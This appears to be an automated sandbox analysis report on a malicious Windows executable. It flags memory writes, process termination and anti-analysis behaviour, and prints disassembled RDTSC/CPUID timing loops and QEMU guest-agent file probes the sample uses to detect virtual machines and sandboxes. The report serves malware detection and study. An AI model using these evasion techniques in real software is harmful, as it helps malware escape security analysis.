Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7423B NtWriteVirtualMemory,LoadLibraryA,	0_2_02A7423B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7100B TerminateProcess,	0_2_02A7100B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70919 EnumWindows,LoadLibraryA,	0_2_02A70919
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC22 LoadLibraryA,NtSetInformationThread,	0_2_02A7DC22
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762AE NtWriteVirtualMemory,	0_2_02A762AE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A742E7	0_2_02A742E7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A752EE	0_2_02A752EE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762F2 NtWriteVirtualMemory,	0_2_02A762F2
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762C1 NtWriteVirtualMemory,	0_2_02A762C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7122B TerminateProcess,	0_2_02A7122B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7623A NtWriteVirtualMemory,	0_2_02A7623A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71209 TerminateProcess,	0_2_02A71209
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71275 TerminateProcess,	0_2_02A71275
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7424C	0_2_02A7424C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71A54 TerminateProcess,	0_2_02A71A54
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A713BF TerminateProcess,	0_2_02A713BF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7438F	0_2_02A7438F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76B8F NtWriteVirtualMemory,	0_2_02A76B8F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76397 NtWriteVirtualMemory,	0_2_02A76397
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A713FF TerminateProcess,	0_2_02A713FF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A763C1 NtWriteVirtualMemory,	0_2_02A763C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77BC0 NtWriteVirtualMemory,TerminateProcess,	0_2_02A77BC0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71328 TerminateProcess,	0_2_02A71328
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A710A6 TerminateProcess,	0_2_02A710A6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A718A6 TerminateProcess,	0_2_02A718A6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A758A4 LoadLibraryA,	0_2_02A758A4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A748B7	0_2_02A748B7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7188F TerminateProcess,	0_2_02A7188F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7208F	0_2_02A7208F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A720E3	0_2_02A720E3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A710F3 TerminateProcess,	0_2_02A710F3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E8D5	0_2_02A7E8D5
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A768DB NtWriteVirtualMemory,	0_2_02A768DB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7100E TerminateProcess,	0_2_02A7100E
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71012 TerminateProcess,	0_2_02A71012
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71071 TerminateProcess,	0_2_02A71071
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71871 TerminateProcess,	0_2_02A71871
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76843 NtWriteVirtualMemory,	0_2_02A76843
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A719B1 TerminateProcess,	0_2_02A719B1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E98A	0_2_02A7E98A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74990	0_2_02A74990
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A789EE	0_2_02A789EE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A761F4 NtWriteVirtualMemory,	0_2_02A761F4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74926	0_2_02A74926
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73924	0_2_02A73924
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73921	0_2_02A73921
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71967 TerminateProcess,	0_2_02A71967
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71165 TerminateProcess,	0_2_02A71165
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E961	0_2_02A7E961
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76976 NtWriteVirtualMemory,	0_2_02A76976
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7214F	0_2_02A7214F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71E86	0_2_02A71E86
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7469F	0_2_02A7469F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A766F7 NtWriteVirtualMemory,	0_2_02A766F7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71E67	0_2_02A71E67
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76647 NtWriteVirtualMemory,	0_2_02A76647
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71644 TerminateProcess,	0_2_02A71644
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71654 TerminateProcess,	0_2_02A71654
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A767EC NtWriteVirtualMemory,	0_2_02A767EC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71FFB	0_2_02A71FFB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A747FB	0_2_02A747FB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A717C7 TerminateProcess,	0_2_02A717C7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71F37	0_2_02A71F37
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75709 NtWriteVirtualMemory,	0_2_02A75709
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71717 TerminateProcess,	0_2_02A71717
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7177A TerminateProcess,	0_2_02A7177A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74744	0_2_02A74744
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A764EB NtWriteVirtualMemory,	0_2_02A764EB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74433	0_2_02A74433
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76432 NtWriteVirtualMemory,	0_2_02A76432
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71463 TerminateProcess,	0_2_02A71463
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76C6A NtWriteVirtualMemory,	0_2_02A76C6A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BC75 NtWriteVirtualMemory,LoadLibraryA,	0_2_02A7BC75
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75D82 NtWriteVirtualMemory,	0_2_02A75D82
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76582 NtWriteVirtualMemory,	0_2_02A76582
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71592 TerminateProcess,	0_2_02A71592
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A745DB	0_2_02A745DB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A72D30	0_2_02A72D30
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7450F	0_2_02A7450F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76D0F NtWriteVirtualMemory,	0_2_02A76D0F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7A576 NtWriteVirtualMemory,	0_2_02A7A576
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7455F	0_2_02A7455F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 16_2_0056E89F	16_2_0056E89F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 16_2_0056E98A	16_2_0056E98A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 16_2_0056E961	16_2_0056E961

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A7C96F second address: 0000000002A7C96F instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A708F9 second address: 0000000002A708F9 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A71C4A second address: 0000000002A71C4A instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A77AC4 second address: 0000000002A77AC4 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76A8A second address: 0000000002A76B31 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor esi, 58A792A8h 0x00000010 test bh, bh 0x00000012 cmp edx, eax 0x00000014 xor esi, 318B51C7h 0x0000001a add esi, 2B3F7621h 0x00000020 test dx, ax 0x00000023 push esi 0x00000024 mov esi, dword ptr [ebp+00000206h] 0x0000002a test dl, cl 0x0000002c mov dword ptr [ebp+00000240h], eax 0x00000032 test ah, FFFFFFD5h 0x00000035 mov eax, 808116E1h 0x0000003a cmp bx, AA3Fh 0x0000003f xor eax, 669D47CFh 0x00000044 jmp 00007F2994B84CF2h 0x00000046 cmp ebx, ecx 0x00000048 add eax, 0060AF4Eh 0x0000004d cmp cl, dl 0x0000004f sub eax, E67D007Bh 0x00000054 test dh, 00000000h 0x00000057 cmp edi, 60808D3Eh 0x0000005d push eax 0x0000005e mov eax, dword ptr [ebp+00000240h] 0x00000064 test esi, F9C4EDE0h 0x0000006a sub edi, 20h 0x0000006d mov dword ptr [ebp+00000202h], ebx 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 pushad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76B31 second address: 0000000002A76BDC instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov ebx, dword ptr [ebp+00000202h] 0x00000010 test bh, bh 0x00000012 cmp edx, eax 0x00000014 add edi, 20h 0x00000017 mov dword ptr [ebp+0000023Eh], ecx 0x0000001d mov ecx, edi 0x0000001f push ecx 0x00000020 test dx, ax 0x00000023 mov ecx, dword ptr [ebp+0000023Eh] 0x00000029 test dl, cl 0x0000002b mov dword ptr [ebp+0000023Bh], ecx 0x00000031 mov ecx, 005F6649h 0x00000036 test ah, 00000036h 0x00000039 sub ecx, 2C1083A2h 0x0000003f cmp bx, AC4Fh 0x00000044 xor ecx, A25F7B13h 0x0000004a test ah, ch 0x0000004c sub ecx, 761199B3h 0x00000052 jmp 00007F2994B84CD6h 0x00000054 test bl, al 0x00000056 push ecx 0x00000057 cmp ecx, F5C42B54h 0x0000005d mov ecx, dword ptr [ebp+0000023Bh] 0x00000063 test al, bl 0x00000065 mov dword ptr [ebp+0000010Ch], 00000000h 0x0000006f mov eax, ebp 0x00000071 add eax, 0000010Ch 0x00000076 pushad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76BDC second address: 0000000002A76C00 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001F8h], esi 0x00000010 cmp dl, al 0x00000012 mov esi, eax 0x00000014 push esi 0x00000015 test dl, al 0x00000017 mov esi, dword ptr [ebp+000001F8h] 0x0000001d cmp dx, ax 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A77665 second address: 0000000002A77665 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000000568F50 second address: 0000000000568F50 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000000568FB5 second address: 0000000000568FB5 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 00000000005646D1 second address: 00000000005646D1 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 00000000005649A9 second address: 00000000005649A9 instructions:

Tries to detect Any.run

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 8rbuJ8Ycv1.exe, 00000000.00000002.887799869.0000000002A90000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: 8rbuJ8Ycv1.exe, 00000000.00000002.887799869.0000000002A90000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A7BD5F second address: 0000000002A7BD87 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b nop 0x0000000c test eax, D0AB5031h 0x00000011 cmp bx, bx 0x00000014 test bl, 00000003h 0x00000017 cmp dh, FFFFFFFEh 0x0000001a add esi, 00001000h 0x00000020 cmp eax, ebx 0x00000022 pushad 0x00000023 mov edx, 00000093h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A705C5 second address: 0000000002A7BA17 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 test dh, bh 0x00000005 add esp, 24h 0x00000008 test dh, ah 0x0000000a cmp dx, A12Ah 0x0000000f call 00007F2994B8FD15h 0x00000014 test dh, ch 0x00000016 call 00007F2994B84FF4h 0x0000001b test dx, 96EDh 0x00000020 test dx, ax 0x00000023 xor edi, edi 0x00000025 test al, bl 0x00000027 mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000031 cmp ch, ah 0x00000033 jmp 00007F2994B84CF2h 0x00000035 test dh, ah 0x00000037 call 00007F2994B84D24h 0x0000003c call 00007F2994B84D1Dh 0x00000041 lfence 0x00000044 mov edx, E38313D7h 0x00000049 sub edx, 2F16C57Fh 0x0000004f xor edx, 80E7F4C8h 0x00000055 xor edx, 4B75BA84h 0x0000005b mov edx, dword ptr [edx] 0x0000005d lfence 0x00000060 jmp 00007F2994B84CF2h 0x00000062 push di 0x00000064 mov di, 99DEh 0x00000068 pop di 0x0000006a cmp ch, dh 0x0000006c test edx, edx 0x0000006e cmp cl, al 0x00000070 cmp ebx, ebx 0x00000072 cmp dl, cl 0x00000074 cmp ax, bx 0x00000077 cmp ch, bh 0x00000079 ret 0x0000007a mov esi, edx 0x0000007c pushad 0x0000007d rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A7B9EF second address: 0000000002A7BB1A instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp edi, eax 0x00000005 mov eax, dword ptr [ebp+00000175h] 0x0000000b jnl 00007F2994B84C0Ah 0x00000011 test dl, dl 0x00000013 cmp dl, FFFFFFE9h 0x00000016 ret 0x00000017 cmp ebx, ebx 0x00000019 mov dword ptr [ebp+0000009Ch], 00000000h 0x00000023 test eax, eax 0x00000025 mov edi, B28D7814h 0x0000002a test ebx, eax 0x0000002c test ax, bx 0x0000002f xor edi, 94CDCD0Ch 0x00000035 add edi, C10EBF9Eh 0x0000003b test ax, dx 0x0000003e add edi, 18B08B4Ah 0x00000044 mov ecx, F9001DB1h 0x00000049 test edx, edx 0x0000004b test si, 62FDh 0x00000050 xor ecx, B787FB11h 0x00000056 xor ecx, 80F9B81Eh 0x0000005c jmp 00007F2994B84CD2h 0x0000005e test ah, FFFFFF87h 0x00000061 add ecx, 318327E2h 0x00000067 cmp dx, bx 0x0000006a cmp cl, FFFFFFE1h 0x0000006d cmp bh, dh 0x0000006f pushad 0x00000070 mov cx, DA7Eh 0x00000074 cmp cx, DA7Eh 0x00000079 jne 00007F2994B7A0F0h 0x0000007f popad 0x00000080 mov dword ptr [ebp+00000270h], edi 0x00000086 mov edi, ecx 0x00000088 push edi 0x00000089 cmp eax, eax 0x0000008b mov edi, dword ptr [ebp+00000270h] 0x00000091 cmp al, bl 0x00000093 cmp al, dl 0x00000095 test dh, dh 0x00000097 call 00007F2994B84E77h 0x0000009c call 00007F2994B84F00h 0x000000a1 lfence 0x000000a4 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A7BB1A second address: 0000000002A7BB1A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F88CF074h 0x00000013 sub eax, F33A243Ch 0x00000018 add eax, C091F0E2h 0x0000001d sub eax, C5E4BD19h 0x00000022 cpuid 0x00000024 cmp bx, ax 0x00000027 bt ecx, 1Fh 0x0000002b test ecx, eax 0x0000002d jc 00007F2994B856CDh 0x00000033 popad 0x00000034 cmp cl, al 0x00000036 call 00007F2994B84EF0h 0x0000003b lfence 0x0000003e rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A7C96F second address: 0000000002A7C96F instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A708F9 second address: 0000000002A708F9 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A71C4A second address: 0000000002A71C4A instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A77AC4 second address: 0000000002A77AC4 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A7A4FA second address: 0000000002A7A4FA instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp byte ptr [eax], cl 0x00000005 mov ecx, dword ptr [ebp+00000252h] 0x0000000b jne 00007F2994B84B20h 0x00000011 jmp 00007F2994B84CD2h 0x00000013 cmp cx, 0F8Fh 0x00000018 mov dl, byte ptr [eax] 0x0000001a jmp 00007F2994B84CD2h 0x0000001c cmp ah, dh 0x0000001e mov byte ptr [ebx], dl 0x00000020 jmp 00007F2994B84CD2h 0x00000022 test dh, bh 0x00000024 add eax, 02h 0x00000027 add ebx, 02h 0x0000002a add ecx, 02h 0x0000002d mov dword ptr [ebp+00000252h], ecx 0x00000033 mov ecx, E089AE1Eh 0x00000038 jmp 00007F2994B84CD2h 0x0000003a cmp edi, 4C2B4D6Ch 0x00000040 xor ecx, 43CBDC15h 0x00000046 jmp 00007F2994B84CD6h 0x00000048 test bh, FFFFFFABh 0x0000004b xor ecx, 65B5FDABh 0x00000051 jmp 00007F2994B84CD2h 0x00000053 test cx, cx 0x00000056 add ecx, 39087060h 0x0000005c pushad 0x0000005d mov ecx, 000000D7h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76A8A second address: 0000000002A76B31 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor esi, 58A792A8h 0x00000010 test bh, bh 0x00000012 cmp edx, eax 0x00000014 xor esi, 318B51C7h 0x0000001a add esi, 2B3F7621h 0x00000020 test dx, ax 0x00000023 push esi 0x00000024 mov esi, dword ptr [ebp+00000206h] 0x0000002a test dl, cl 0x0000002c mov dword ptr [ebp+00000240h], eax 0x00000032 test ah, FFFFFFD5h 0x00000035 mov eax, 808116E1h 0x0000003a cmp bx, AA3Fh 0x0000003f xor eax, 669D47CFh 0x00000044 jmp 00007F2994B84CF2h 0x00000046 cmp ebx, ecx 0x00000048 add eax, 0060AF4Eh 0x0000004d cmp cl, dl 0x0000004f sub eax, E67D007Bh 0x00000054 test dh, 00000000h 0x00000057 cmp edi, 60808D3Eh 0x0000005d push eax 0x0000005e mov eax, dword ptr [ebp+00000240h] 0x00000064 test esi, F9C4EDE0h 0x0000006a sub edi, 20h 0x0000006d mov dword ptr [ebp+00000202h], ebx 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 pushad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76B31 second address: 0000000002A76BDC instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov ebx, dword ptr [ebp+00000202h] 0x00000010 test bh, bh 0x00000012 cmp edx, eax 0x00000014 add edi, 20h 0x00000017 mov dword ptr [ebp+0000023Eh], ecx 0x0000001d mov ecx, edi 0x0000001f push ecx 0x00000020 test dx, ax 0x00000023 mov ecx, dword ptr [ebp+0000023Eh] 0x00000029 test dl, cl 0x0000002b mov dword ptr [ebp+0000023Bh], ecx 0x00000031 mov ecx, 005F6649h 0x00000036 test ah, 00000036h 0x00000039 sub ecx, 2C1083A2h 0x0000003f cmp bx, AC4Fh 0x00000044 xor ecx, A25F7B13h 0x0000004a test ah, ch 0x0000004c sub ecx, 761199B3h 0x00000052 jmp 00007F2994B84CD6h 0x00000054 test bl, al 0x00000056 push ecx 0x00000057 cmp ecx, F5C42B54h 0x0000005d mov ecx, dword ptr [ebp+0000023Bh] 0x00000063 test al, bl 0x00000065 mov dword ptr [ebp+0000010Ch], 00000000h 0x0000006f mov eax, ebp 0x00000071 add eax, 0000010Ch 0x00000076 pushad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76BDC second address: 0000000002A76C00 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001F8h], esi 0x00000010 cmp dl, al 0x00000012 mov esi, eax 0x00000014 push esi 0x00000015 test dl, al 0x00000017 mov esi, dword ptr [ebp+000001F8h] 0x0000001d cmp dx, ax 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
